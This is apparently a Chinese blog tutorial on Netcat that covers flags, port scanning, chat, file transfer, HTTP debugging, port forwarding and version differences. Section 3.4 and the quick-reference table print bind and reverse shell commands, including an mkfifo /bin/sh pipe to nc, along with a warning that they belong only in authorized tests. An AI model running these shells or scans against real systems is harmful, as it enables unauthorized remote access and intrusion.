当前位置：首页 > article >正文

Netcat (nc) 全面使用指南

article 2026/5/25 2:18:07

Netcat 被誉为网络工具中的瑞士军刀是一个功能强大的网络调试和诊断工具。它可以在 TCP/UDP 协议下进行连接、监听、端口扫描、文件传输和代理转发等操作。一、安装与基本语法1.1 安装方法操作系统安装命令Ubuntu/Debiansudo apt install netcat-openbsdCentOS/RHELsudo yum install ncmacOSbrew install netcatWindows下载 ncat 或独立nc.exe1.2 基本语法nc [选项] [目标主机] [端口]Netcat 有两种核心工作模式模式说明典型命令客户端模式连接模式主动连接到远程主机nc host port服务器模式监听模式监听本地端口等待连接nc -l -p port二、核心参数详解2.1 基础参数参数说明示例-l监听模式作为服务器端nc -l 8080-p指定本地端口nc -l -p 8080-u使用 UDP 协议默认 TCPnc -u -l 8080-v详细输出-vv更详细nc -vz target 80-n不进行 DNS 解析nc -nv 192.168.1.1 80-z零 I/O 模式仅扫描端口nc -zv target 1-1000-w设置超时时间秒nc -w 3 target 80-k保持监听接受多个连接nc -lk 8080-4仅使用 IPv4nc -4 target 80-6仅使用 IPv6nc -6 target 802.2 高级参数参数说明适用场景-e连接后执行程序危险反向 Shell-c通过/bin/sh执行命令替代-e-x通过代理连接穿透代理-X代理协议4/5/connectSOCKS 代理-NEOF 后关闭 socket规范关闭连接2.3 参数差异说明重要不同 Linux 发行版内置的nc版本可能有差异版本特点常见发行版OpenBSD 版功能丰富、安全无-e选项Ubuntu、Debian、macOSTraditional 版支持-e选项CentOS 6、RHEL 6Ncat (Nmap)功能最全支持 SSL可单独安装查看版本nc -h看输出特征判断。三、核心功能场景3.1 端口扫描TCP 端口扫描# 扫描单个端口 nc -zv 192.168.1.1 22 # 扫描端口范围 nc -zv 192.168.1.1 20-100 # 详细扫描两次 -v nc -vvz 192.168.1.1 80-443 # 带超时扫描 nc -zvw 3 192.168.1.1 1-1000UDP 端口扫描UDP 扫描可靠性较低nc -zuv 192.168.1.1 53 nc -zuv 192.168.1.1 1-100使用说明-z不发送任何数据仅检查连接状态-v显示详细信息-v -v显示更详细内容-w 3设置超时 3 秒避免长时间等待3.2 建立 TCP/UDP 连接与聊天TCP 聊天# 服务器端监听 nc -l 8080 # 客户端连接 nc 192.168.1.100 8080UDP 聊天# 服务端 nc -u -l 8080 # 客户端 nc -u 192.168.1.100 8080连接建立后双方输入的内容会发送给对方按CtrlC退出。持续监听模式接受多个连接nc -lk 80803.3 文件传输传输单个文件# 接收端服务器 nc -l 8080 received_file.txt # 发送端客户端 nc 192.168.1.100 8080 send_file.txt传输目录结合tar# 接收端监听并解压 nc -l 8080 | tar xzvf - # 发送端打包并发送 tar czvf - /path/to/dir | nc 192.168.1.100 8080传输完成后自动关闭当发送端文件传输完毕连接自动关闭。3.4 远程 Shell反弹 Shell正向 Shell目标机器主动提供 Shell# 目标机器服务器 nc -l 8080 -e /bin/bash # Linux需 -e 支持 nc -l 8080 -e cmd.exe # Windows # 控制端客户端 nc target_ip 8080反向 Shell更常用可突破防火墙# 控制端等待连接 nc -l 8080 # 目标机器主动连接 nc 控制端IP 8080 -e /bin/bash无需-e的反向 ShellOpenBSD 版本# 控制端 nc -l 8080 # 目标机器 mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 21 | nc 控制端IP 8080 /tmp/f安全警告-e功能极不安全仅限授权测试环境使用。3.5 HTTP 调试与 Web 服务模拟手动发送 HTTP 请求# 连接后手动输入 nc example.com 80 GET / HTTP/1.1 Host: example.com # 或通过 echo 发送 echo -e GET / HTTP/1.1\r\nHost: example.com\r\n\r\n | nc example.com 80模拟简单 Web 服务器# 返回固定内容 echo -e HTTP/1.1 200 OK\r\n\r\nHello World | nc -l 8080 # 持续响应循环 while true; do echo -e HTTP/1.1 200 OK\r\n\r\n$(date) | nc -l 8080; done3.6 端口转发与代理基本端口转发# 将本地 8080 转发到目标 80需命名管道 mkfifo /tmp/fifo cat /tmp/fifo | nc target 80 | nc -l 8080 /tmp/fifoNcat 代理功能功能更完整# 通过 SOCKS5 代理连接 ncat --proxy socks5://proxy:1080 --proxy-type socks5 target 80 # SSL 加密连接 ncat --ssl target 443四、实用命令速查用途命令端口扫描nc -zv target 1-1000UDP 端口扫描nc -zuv target 53简单聊天服务器nc -l 8080UDP 聊天nc -u -l 8080文件接收nc -l 8080 file文件发送nc target 8080 file目录传输发送tar czf - ./dir | nc target 8080目录传输接收nc -l 8080 | tar xzvf -HTTP GET 请求echo -e GET / HTTP/1.1\r\nHost: target\r\n\r\n | nc target 80简单 Web 服务echo -e HTTP/1.1 200 OK\r\n\r\nOK | nc -l 8080反向 ShellLinuxnc target 8080 -e /bin/bash反向 Shell无 -emkfifo /tmp/f; cat /tmp/f | /bin/sh -i 21 | nc target 8080 /tmp/f五、不同版本对比特性OpenBSD ncTraditional ncNcat (Nmap)默认端口扫描-z✅✅✅UDP 支持-u✅✅✅-e选项❌ 不支持✅ 支持✅ 支持SSL/TLS 加密❌❌✅代理支持SOCKS/HTTP✅OpenBSD 新版❌✅多连接模式-k✅❌✅适用场景日常使用老脚本/逆向 Shell安全测试/加密传输推荐日常使用 → OpenBSD 版本系统自带需要-e→ 安装 Ncat 或 Traditional 版需要加密 → 使用 Ncat--ssl选项六、注意事项安全使用-e选项极其危险会暴露系统 Shell仅限授权测试环境使用生产环境推荐使用 Ncat SSL 加密传输敏感数据网络影响高速端口扫描可能被安全设备识别为攻击行为UDP 扫描容易出现误报应配合其他工具验证权限要求绑定 1024 以下端口需要 root 权限某些功能需要 root 权限才能正常工作

Netcat (nc) 全面使用指南

相关文章：

Netcat (nc) 全面使用指南

SSH Host key verification failed 原因与安全处理指南

别再只用XGBoost了！用Python手把手教你玩转Stacking和Blending模型融合

从客户分群到市场细分：系统聚类法在Python/R中的商业案例分析

qmcdump完整指南：3步轻松解密QQ音乐加密文件

量子机器学习提升软件测试效率的混合优化框架

ARM ETE跟踪单元与单次比较器控制技术解析

3DMAX傻瓜式插件SimpleRope：一键生成绳子软管螺旋线！

ARM SVE2指令集与USUBWB指令优化实践

ARM SVE2向量指令UQSHLR与URSHLR详解

【架构实战】解决长文本多轮对话中的“上下文腐化”问题：基于 Multi-Agent 的异步调度引擎设计

别再死磕OFDMA了！用Python+PyTorch手把手复现NOMA的SIC接收机（附代码）

ARM Trace Buffer扩展与调试同步机制详解

芯祥联MQTT BROKER 各服务器平台部署方法培训-1

别再死记公式了！用Python手把手复现西瓜书3.0α数据集的对率回归（附完整代码与可视化）

告别默认图表：手把手教你定制VASPKIT的PLOT.In文件，画出符合期刊要求的能带图

Nature|619372人循环代谢性状的遗传分析

魔兽争霸3终极优化指南：5分钟彻底解决画面拉伸和帧率锁定问题

勒索软件时代：你的备份数据安全吗？

QM/MM与ML/MM模拟对比：从呋喃光化学弛豫看机器学习力场结构保真度

机器学习势函数与量子热浴结合：精准模拟钛酸钡相变中的核量子效应

如何安装OpenClaw？2026年京东云部署及配置Token Plan详细攻略

终极QMC解密指南：如何快速将QQ音乐加密音频转换为MP3/FLAC格式

人形机器人场景数据采集实战：从方案设计到质量验收

Redis 缓存实战案例与技术详解

ros2_control 代码架构分析

不只是驱动问题：深度排查Windows CMD中nvidia-smi失效的5种可能及解决方案

S32K144FTM定时器中断

CentOS服务器上VNC连接总出问题？这份保姆级排错手册（含端口混乱、服务重启、密码修改）

2026年了，还在为电力负荷预测发愁？基于XGBoost的多变量单步预测全栈实战！